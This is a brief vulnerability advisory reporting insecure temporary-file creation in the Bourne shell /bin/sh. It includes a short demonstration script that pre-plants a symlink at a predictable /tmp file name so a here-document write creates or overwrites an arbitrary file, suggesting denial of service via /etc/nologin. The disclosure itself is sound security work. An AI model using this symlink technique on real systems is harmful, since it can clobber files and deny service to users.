[ SOURCE: http://www.secureroot.com/security/advisories/9755052026.html ]

Similarly to the recently discussed tcsh vulnerability, the Bourne shell

/bin/sh also creates temporary files in an insecure way, and can be

exploited to create arbitrary files or to overwrite existing ones. While

this vulnerability can be exploited for a denial-of-service attack, it is

not clear how to use it to gain additional privileges.



I have confirmed this vulnerability in two (recent-version) commercial

UNIXes.



Demonstration:



#!/bin/sh -x

ls -l /tmp/nologin

ln -s /tmp/nologin /tmp/sh$$0

cat <<EOF

Only root can create /etc/nologin.

Do any boot-time scripts use sh?

EOF

ls -l /tmp/nologin



Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/

School of Mathematics and Statistics  University of Sydney   2006  Australia